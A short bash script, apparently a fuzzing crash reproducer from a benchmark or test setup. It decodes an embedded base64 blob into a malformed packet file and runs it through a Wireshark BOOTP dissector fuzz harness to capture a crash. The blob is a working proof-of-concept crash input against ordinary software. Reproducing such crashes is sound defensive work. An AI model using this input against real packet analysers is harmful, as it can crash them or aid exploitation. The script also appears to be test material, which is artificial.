#!/usr/bin/env bash
set -euo pipefail
python3 -c "
import base64
data = 'APIA8gDyAPIA8gDyAAAAAAAAAAADAAAAAAAAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAArQkA7BAAAAAAAAAA9AA0AAD0AAAA0AgMAAAAAAAA8ACcBPAEBPwAAAAAAAAAAAAA0AgMAAAAAAAA8ACcBPAEAAAAAAAAAAA0AJwBleGFjdF9hcnRpZmFjdF9wYQA9AAAANAIDAAAAAAAAPAAnATwBAT8AAAAAAAAAAAAANAIDAAAAAAAAPAAnATxpZmFjdF9wYQA9AAAANAIDAAAAAAAAPAAnATwBAT8AAAAAAAAAAAAANAIDADwAJwE8AAAAAAAAPAAnATwBAT8AAAAAAAAAAAAANAIDADwAJw=='
with open('/tmp/gt_poc', 'wb') as f:
    f.write(base64.b64decode(data))
"
/out/fuzzshark_udp_port-bootp /tmp/gt_poc 2>&1 | tee /tmp/crash_output.txt
